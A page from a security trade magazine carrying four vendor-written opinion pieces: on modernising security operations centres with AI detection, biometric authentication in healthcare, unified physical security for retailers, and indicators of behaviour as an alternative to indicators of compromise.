Connect with us

Expert Speak

SOC Modernisation: A Digital Labrador for Next-Level Cybersecurity



Written by Ammar Enaya, Regional Director – METNA, Vectra AI

The Arab Gulf region has a well-deserved reputation for being a frontrunner in technology adoption — a reputation that its governments have retained throughout the Fourth Industrial Revolution. In the digital transformation era, managed services wormed their way onto the agenda of most, if not every, regional organisations, but until recently — cybersecurity remained an afterthought.

However, governments in this region have a way of inspiring others by example. By adopting economic visions with technology pillars that put cybersecurity front and center, GCC leaders pushed digital risk management to a top-priority position in the private sector. And those efforts have paid dividends. Saudi Arabia is second and the UAE fifth, on the International Telecommunication Union’s Global Cybersecurity Index for 2020.

But there’s still work to be done. Security professionals are overworked and under-resourced. This starts in the security operations center (SOC), which all too often is holding on to a legacy that has had its day. Modern complexities of rogue devices, remote employees, and multi-cloud environments have brought previously unseen levels of unpredictability to the SOC. These transformative changes coupled with advanced attack methods used in today’s ransomware and supply chain attacks equal a disaster waiting to happen for any organisation that isn’t thinking about modernizing the traditional approach.

The Old Way Opens Doors for New Attacks
Traditionally, the legacy SOC is centered around prevention (think SIEM and IDS), which for the most part is obsolete against modern threats and attack methods. The tools typically deployed in this scenario equal a high cost of ownership and fail when it comes to the detection and response of in-progress attacks. This is because the technologies used today have grown past the SOC as we’ve come to know it. The perimeter no longer exists, and cloud deployments are outpacing security. Analysts are having to work harder to trawl manually through limited data sources only to arrive at inaccurate conclusions. Ultimately what you’re left with is a lack of visibility and a security team scrambling through inefficient workflows at a high price.

The time for change is now. We’ve seen again and again how prevention techniques fail to detect ransomware attacks. These are human driven attacks — where malware isn’t deployed until the final step — meaning the only chance to stop it, is by detecting and stopping attacker motions inside an environment. Nowadays, attackers are finding all types of clever ways to bypass MFA. And while endpoint detection is important, it’s no match for a crafty attacker with stolen credentials.

But the good news is that defending against today’s attacks doesn’t have to be as impossible as the headlines might lead you to believe.

Moving Towards a Modernized SOC
Before we look at the alternative, it is also worth considering the life of today’s security professionals. Who without, the SOC would be the equivalent of falling trees in an empty forest. While the customer experience was all the rage before the pandemic, organisations must now prioritize the employee experience. The now-established efficacy of remote work means the region’s cyber-talent can work anywhere they want. So, as the region builds SOCs, it needs to design ecosystems that relieve burdens on technologists, or it risks losing the most qualified candidates to foreign employers.

This is all the more reason to modernize and take a futureproof approach that prioritizes visibility and workflow, acting as a kind of digital Labrador retriever — capable of sniffing out and fetching the most evasive targets and dropping them at the feet of threat hunters. It still uses event logs and SIEM tactics but supplements them with richer endpoint and network data. It mixes the disciplines of endpoint detection and response (EDR), AI-driven network detection and response (NDR) and user and entity behavior analytics (UEBA). The new SOC drapes a net across on-prem, cloud and cloud-native apps, allowing it to detect previously unknown suspect processes and lateral-movement attacks.

And if you’re looking for a place to start, meaningful AI can lend an immediate hand in the SOC. Everything from improving alert accuracy, optimizing investigations, threat hunting and adding extra horsepower so analysts know which threats to prioritize, can be achieved with the right AI platform. AI can also help SOCs play to the strengths of its players. For example, AI is incredibly proficient at dealing with large sets of data efficiency and at speeds unmatched by humans. On the other hand, humans are exceptional at dealing with ambiguity and contextualizing information — things they’ll be able to do with AI on their team. An analyst can’t see an attack evolving in the middle of the night, but the right AI can catch and stop it so they can get some rest once in a while.

A Breath of Fresh Air in the SOC
Modernization is the future for any organisation intent on delivering an efficient, sustainable SOC. And while this is becoming an increasingly urgent matter for many organisations in order to defend against today’s attacks, it can also be approached in phases by setting achievable goals. For example, if you lack the visibility necessary to accurately detect and respond to an adversary, you may want to prioritize implementing a solution that can help spot early attack signals like recon, privilege escalation, and lateral movement. Or if your organisation has traditionally been focused on prevention, it could be time to evaluate where security investments need to be made in order to gain coverage throughout the entire environment.

In a region where regulatory compliance keeps a lot of stakeholders up at night, a modernized SOC can greatly enhance governance and instill confidence in regulators, investors, and customers. The ability to detect, score and prioritize threats in real-time ensures swift and effective resolution of issues and prevents costly and embarrassing breaches.

Fewer manhours, better outcomes, lower costs, faster resolution, tighter compliance, and the ability to go up against unknown and stealthy attacks? Now that’s a Labrador that deserves a treat.


Biometric Authentication – A Cure for the Common Password



Written by Debra Miller, the Digital Marketing Communications Manager at HID

From 2019 through 2021, nearly 1,900 healthcare data breaches of 500 or more records have been reported to the Health and Human Services Office for Civil Rights. Those breaches exposed the sensitive and supposedly protected health information of 49.8 million individuals in 2021, an 11% increase compared to 2019. The reasons for security attacks are obvious and not so obvious.

The Root Cause of Most Healthcare Security Breaches
The human element, such as phishing, stolen credentials, and human error, causes 82% of data breaches. It is little wonder that these conditions pose critical security and financial risks to the healthcare industry.

One of the obvious reasons for security breaches is that healthcare workers log in to multiple computer systems dozens of times per shift. Consequently, healthcare workers must remember eight to 20 passwords to access patient-care applications.

Because they work under extreme time constraints and need to remember complicated, ever-changing passwords, some healthcare workers engage in risky password behaviours. For example, 51% of people reuse work passwords in their personal lives. Unfortunately, 44% of people know the risks of reusing passwords but do it anyway; and 69% of employees admit to sharing passwords with colleagues at work. These conditions lead to compromised, weak, and reused passwords, causing 81% of data breaches.

Moreover, for the past 12 years, healthcare, one of the more highly regulated industries, has suffered the highest average cost due to system breaches.  An individual’s health data on the black market can be worth more than a credit card because patient records often contain all their personal and financial information (PII).

Malicious actors also seek healthcare organization vulnerabilities in not-so-obvious ways, like those found in outdated IT infrastructure or software. Another not-so-obvious target is a healthcare worker’s use of personal devices that connect to the network. And even internet-connected medical devices like insulin pumps and heart rate monitors are an easy gateway to accessing the servers holding patient data.

How Biometric Authentication Provides a Cure for the Common Password
Preventing those breaches is critical to protecting patient privacy and confidentiality. This makes biometric authentication a critical element of a healthcare organization’s identity assurance strategy.

Biometric authentication delivers the highest level of identity assurance. While passwords are easy to forget, and wristbands and ID cards can be misplaced or stolen, biometric markers are unique to each individual and cannot be lost or forgotten. Biometric technology relies on something we always have with us: our fingerprints or faces.

Here’s how biometric authentication works. It compares two sets of data, the first is preset by the device owner, and the second belongs to the device visitor. If the two data are nearly identical, the device knows that “visitor” and “owner” are one and the same and gives access to the visitor.

Biometric authentication provides a cure for the common password by providing healthcare organizations with the following benefits:

  • Irrefutable proof of presence for regulatory and legal compliance. Biometric authentication provides instant insights into who accessed which systems and resources and accurately identify patients across multiple systems and facilities.
  • Fast and easy patient identity assurance. Biometric matching takes a fraction of a second. Accelerated access to patient data enables clinicians to be more productive and provide better care throughout the patient journey. Biometric authentication streamlines patient registration, check-in, and care eligibility verification. And, in a health emergency, quick, easy, and comprehensive access to medical records saves lives.
  • Minimized human intervention for improved data accuracy. Biometric identification is automated, frictionless, and sterile. It ensures data accuracy even when people wear surgical masks, and it eliminates duplicate medical records. Fingerprint scanners have accuracy rates above 99.5%. Best-in-class facial recognition systems deliver an error rate of just 0.08%.
  • Mitigated risks of patient misidentification. Patient misidentification costs the healthcare system billions of dollars each year. And more important, it can lead to tragic medical errors that cause temporary or permanent patient harm. Biometric technologies mitigate these risks by increasing accuracy and tying identification to something people always have with them — their fingerprints or faces.
  • Reduced identity fraud. Nearly 43,000 cases of medical identity theft were reported to the Federal Trade Commission in 2021. By extending security to systems that contain personal and sensitive data, biometrics increases the privacy of those individuals and reduces the risk of identity theft.
Continue Reading

Expert Speak

How Can Unified Physical Security Can Help Retailers Thrive in a Changing Environment?



Written by Firas Jadallah, Regional Director, Middle East, and Africa at Genetec

The retail industry has evolved dramatically over a relatively short period. Today, digital transformation has unlocked the creation of new innovative business models centered on frictionless, multi-channel shopping and e-commerce while simultaneously presenting new security challenges. In addition, it’s worth noting that digitization has also facilitated innovation in video surveillance technologies, creating new opportunities for retailers to use data from video management systems (VMS) in conjunction with data from access control systems (ACS), automatic license plate readers (ALPR), identity management systems (IMS), sensors, and more.

The key objectives are not only to reduce shrink but also to improve operational efficiency and the overall buyer experience. However, without a fully unified software solution, it is difficult to comprehend how these data puzzle pieces fit together and make sense. Only when retailers are able to consolidate data from multiple sources, can they gain a comprehensive understanding of their environment. A unified physical security platform that allows for the integration of devices and applications, will successfully create a connected store, which centralizes the management of the entire environment for improved visibility, operations, and data intelligence.

How Retailers Can Benefit from Unification:

Frictionless shopping
The introduction of frictionless shopping solutions such as curbside pickup and self-checkout has presented retail security teams with new challenges. Unified security platforms provide a variety of solutions to overcome these challenges. If theft is suspected, asset protection managers can easily review the video of self-checkout systems and share it with law enforcement as necessary. Unified security platforms also enable IT teams, to devote their time to higher-priority tasks and spend less time on software updates. Similarly, a comprehensive view of the connected store allows corporate security managers to work more effectively and efficiently.

E-commerce and logistics
In 2021, e-commerce sales in the UAE surpassed US$4.8 billion, up from US$2.6 billion in 2019, due to the pandemic-enabled acceleration of the global shift towards online shopping. According to an analysis by the Dubai Chamber of Commerce, the value of the UAE’s e-commerce market is expected to reach $9.2 billion by 2026. This exponential growth of the e-commerce market has given rise to new security concerns and a demand for inventory management logistics at distribution centers.

These centers are often frequented by a large number of non-regular employees, as coordinating the delivery of packages involves multiple parties. Here, ALPR technologies can play a crucial role in tracking who enters and exits distribution centers, and in retail locations, they can record who has received products from a curbside pickup station. ALPR solutions can also assist in identifying Organized Retail Crime (ORC) suspects by determining whether a vehicle has been involved in previous thefts.

Supply chain management is another area in which retail security technologies can play a focal role in overcoming challenges. Retailers can significantly reduce losses by utilizing article tags and video surveillance to monitor their environment and track individual products from suppliers to the warehouse, to the store.

Shrink encompasses numerous forms of loss, but it is primarily caused by external theft, such as organized retail crime (ORC). A recent report by Sensormatic estimates that the annual global retail sales loss due to shrinkage amounts to US$99.56 billion. Aside from the loss of goods, in some cases, retailers are also having to contend with violent altercations with thieves. Retailers are implementing a variety of technologies to combat ORC, including artificial intelligence-based video analytics at point-of-sale (POS)/self-checkout, self-service locking cases, autonomous security robots, and automatic license plate recognition (ALPR), in addition to establishing specialized ORC teams.

Cybersecurity threats such as fraud, account takeovers, malware, ransomware, compromised business emails, and data breaches pose escalating risks for retailers today. Any device connected to a retailer’s network, be it a smart IoT thermostat, an access control sensor, or a computer, has the potential to serve as a gateway for cybercriminals to gain access to private data stored on servers connected to that network. Due to the interconnected nature of modern technology, data must be secured and monitored at every stage.

When multiple solutions that were not designed to work together are implemented, it can be challenging for teams to manage, maintain, and scale. A unified security platform designed with cybersecurity in mind enables retailers to secure their entire IT infrastructure and mitigate network intrusion risks through one of their security devices. A unified security platform designed with cybersecurity in mind enables retailers to secure their entire IT infrastructure and mitigate network intrusion risks through one of their security devices.

Advancing Video Surveillance
The vast improvement in video camera quality and cost reductions over the last year have made video surveillance an essential component of retail security solutions. Furthermore, the digitization and automation of video technologies have further improved their value by transferring mundane tasks from humans to machines. Although adding video surveillance can address some of the challenges posed by frictionless shopping, it can also introduce new ones.

These surveillance systems can accumulate vast volumes of footage, which retailers must then store while also making sense of it. A unified system enables retailers to manage data from all cameras, as well as data from access control and ALPR systems, sensors, smart devices, and maps, through a single, intuitive dashboard. In addition, cross-referencing video footage with additional analytic data can yield insightful results.

These tools can provide invaluable insights into the customer’s journey through the store and at checkout, thereby enabling retailers to enhance their customer’s shopping experience.

Hybrid Cloud Solutions
Cloud-based systems make it efficient for retailers to scale storage requirements as the business environment evolves. However, overhauling an entire IT system all at once is a daunting undertaking. As stores are upgraded or retrofitted, retailers can take advantage of new technologies and functionalities by connecting IoT devices. A hybrid cloud strategy enables retailers to continue operating on-premises systems that meet current requirements while integrating them with adaptable cloud technologies. For companies with a combination of new stores that utilize cloud-based systems and established locations with on-premises systems, support of a hybrid cloud approach through a unified platform enables them to manage the data from all of them in one place.

Insights and Efficiency
When physical security systems are siloed, it is challenging to extract the full value of the data collected by each system. By leveraging a unified, connected store, retailers can combine and display data from all of their security systems in a variety of formats, including customized dashboards, graphical maps, mobile applications, and web clients.

When data is centralized, new insights become apparent. Modern physical security systems allow retailers to personalize dashboards that display data that is most pertinent to specific users. Each department, from asset protection to marketing, will have a unique perspective on data and offer a variety of solutions. Here, interdepartmental collaboration can be essential to the development of new strategies. Moreover, unified security platforms enable retailers to scale, regardless of whether they are opening their first physical store or expanding their global brand to hundreds of locations.

Unified security platforms can be easily deployed and integrated with video surveillance, access control, ALPR, and more. Starting with an open, unified security platform allows retailers to maximize the value of the devices and equipment they already possess, utilizing data in novel ways to streamline operations and gain insights. They can deliver an optimal customer experience without sacrificing security or negatively impacting their bottom line. Everything begins with integration – a connected store for the omnichannel world.

Continue Reading

Expert Speak

Indicators of Behaviour and the Diminishing Value of IOCs



Written by Hussam Sidani, the Regional Vice President for the Middle East and Turkey at Cybereason

How secure is your organization if you can only stop attacks that have already been detected in other environments based on Indicators of Compromise (IOCs)? Secure enough, if those were the only attacks you needed to be concerned with. But what about targeted attacks with bespoke tactics, techniques, and procedures (TTPs) that have never been documented because they were designed only to be used against your organization?

In today’s threat landscape that’s what’s happening: zero-day exploits, never-before-seen malware strains, and advanced techniques developed specifically for high-value targets are plaguing security teams. Most security solutions do a pretty good job of detecting and preventing known threats, but they continue to struggle with detecting and preventing novel threats. But the issue run even deeper than that — how can security teams detect malicious activity on the network earlier if the actions and activities of the attacker are not outwardly malicious because they are typical of activity we expect to see on a network?

The diminishing value of IOCs
Following a security incident, investigators scour for the evidence and artifacts left behind by the attackers. These can include IP addresses, domain names, file hashes, and more. Once these Indicators of Compromise (IOCs) have been documented, they can be shared so that security teams at other organizations can search their environments for similar threats, and security solutions can be tuned to better detect and prevent them from being used in subsequent attacks. That’s great for everyone, except the initial victims of the attacks, of course — for them, the damage has already been done.

Bur IOCs are constantly changing and more often are unique to a specific target, so leveraging IOCs for proactive defense in another environment is unlikely to result in earlier detections. Even the assumption that IOCs are somehow uniformly applicable in every instance, for a given attack campaign in the same environment, has proven to be demonstrably false.

Furthermore, the more advanced attackers engaged with a high-value target often change their TTPs within the same kill chain when moving from one device to the next in a target environment, making early detection based on already-known IOCs nearly impossible. IOCs are still quite valuable for detecting known TTPs, just as outmoded signature-based detections are still effective for detecting common malware strains, and they will continue to be an important aspect of our security toolkits for the foreseeable future.

But given the limitations of their application in surfacing highly targeted and novel attacks as described above, the question remains as to how we can detect more reliably and earlier in the kill chain. That’s where Indicators of Behavior (IOBs) come into play.

Defining Indicators of Behaviour
IOBs describe the subtle chains of malicious activity derived from correlating enriched telemetry from across all network assets. Unlike backward-looking IOCs, IOBs offer a proactive means to leverage real-time telemetry to identify attack activity earlier, and they offer more longevity value than IOCs have ever been able to deliver.

IOBs describe the approach that malicious actors take over the course of an attack. They are based on chains of behavior that can reveal an attack at its earliest stages, which is why they are so powerful in detecting novel and highly targeted operations. Sooner or later, an attacker’s path diverges from the paths of benign actors.

But IOBs is not about just looking for anomalies or a key indicator of malice at a particular moment in time, although that’s also part of it. IOBs are about highlighting the attacker’s trajectory and intentions through analysing chains of behaviors that, when examined together, are malicious and stand out from the background of benign behaviors on the network.

IOBs can also be leveraged to detect the earliest signs of an attack in progress that are comprised of “normal activity” one would expect to see occurring on a network, such as we see with techniques like living off the land (LotL/LOLBin) attacks where legitimate tools, processes, and binaries native to the network are abused by the attacker.

Operationalising IOBs for Operation-Centric security
Today’s alert-centric approach to security puts too much focus on the generation of uncorrelated alerts and remediating the individual elements of the larger attack campaign; a process that has proven to be inefficient given the typical resource constraints security operations are subject to.

Conversely, an Operation-Centric approach leveraging IOBs can reorient the detection and response cycle by consolidating otherwise disparate alerts into a single, content-rich correlated detection that serves to comprehensively disrupt the attack progression earlier than is possible with our current reliance on IOCs alone.

Leveraging IOBs to achieve an Operation-Centric approach also presents the opportunity to create a repository of detectable behavior chains that can surface even the most novel of attacks earlier, as well as support automated response playbooks that can better disrupt attacks at their onset.

More work to be done
Understanding attacker intentions and likely pathways based on early-stage actions and activities enable defenders to proactively predict and disrupt subsequent stages of an attack, as well as provides an avenue to develop fully autonomous security operations. In order to achieve a truly Operation-Centric posture and move closer to autonomous security operations, a future-ready standard that universally defines and operationalizes IOBs is required.

To be truly useful, there needs to be a common definition, language, and expression of IOBs that is completely independent of any particular security tool or vendor. The wide array of solutions available can provide the raw telemetry as well as the color and context required to collectively interpret observable behaviours.

But, as it stands today, security tools themselves don’t provide a standardized language that can accurately describe and operationalise the chains of behavior that will enable us to detect and respond to attacks faster than the adversary can adapt. Operationalising IOBs will require standardization that will deliver the full potential value of the entire security stack to quickly and autonomously deliver the necessary context and correlations across diverse telemetry sources.

But achieving an Operation-Centric approach that leverages IOBs will ultimately empower security operations to predictively respond to changing TTPs more swiftly than attackers can modify and adjust them to circumvent defenses, which is key to finally reversing the adversary advantage and returning the high ground to the Defenders.

Continue Reading

Follow Us


Copyright © 2021 Security Review Magazine. Rysha Media LLC. All Rights Reserved.